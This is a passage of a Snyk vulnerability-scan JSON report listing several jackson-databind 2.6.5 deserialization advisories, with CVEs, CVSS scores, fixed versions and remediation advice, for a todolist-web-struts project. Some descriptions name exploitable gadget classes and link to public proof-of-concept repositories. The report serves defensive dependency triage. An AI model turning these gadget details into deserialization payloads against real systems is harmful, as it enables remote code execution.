"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-13T07:41:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.918541Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "UltramanGaia" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2526", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - 
"cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:49.242419Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", - "epssDetails": { - "percentile": "0.79103", - "probability": "0.00622", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-20330" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-01-03T10:26:22.562970Z", - "functions_new": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-01-03T05:14:08Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-01-03T05:14:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.922905Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", 
- "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2620", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/jas502n/jackson-CVE-2020-8840", - "title": "Jackson PoC" - }, - { - "url": "https://github.com/jas502n/CVE-2020-8840", - "title": "PoC" - }, - { - "url": "https://github.com/Veraxy01/CVE-2020-8840", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "assigner": "NVD", - "severity": "critical", 
- "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:13.011056Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", - "epssDetails": { - "percentile": "0.91001", - "probability": "0.03042", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-8840" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-02-11T07:57:04.144993Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-02-09T21:12:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-02-11T21:12:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:13.031834Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2634", - "title": "Github Issue #1" - }, - { - "url": 
"https://github.com/FasterXML/jackson-databind/issues/2631", - "title": "GitHub Issue #2" - }, - { - "url": "https://github.com/fairyming/CVE-2020-9548", - "title": "GitHub PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.016713Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", - "epssDetails": { - "percentile": "0.79604", - "probability": "0.00652", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-9546", - "CVE-2020-9547", - "CVE-2020-9548" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5p34-5m6p-p58g", - "GHSA-p43x-xfjf-5jhr", - "GHSA-q93h-jc49-78gg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-02T10:29:31.222015Z", - "functions_new": [ - 
{ - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T05:18:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T05:18:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.132894Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Pedro Sampaio" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.3", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": 
"ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2462", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2469", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", - "title": "RedHat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.772859Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose 
data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", - "epssDetails": { - "percentile": "0.73523", - "probability": "0.00392", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14892", - "CVE-2019-14893" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - 
"GHSA-cf6r-3wgc-h863", - "GHSA-qmqc-x3r4-6v39" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-03T08:13:33.357434Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T17:09:34Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T17:09:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.500842Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - 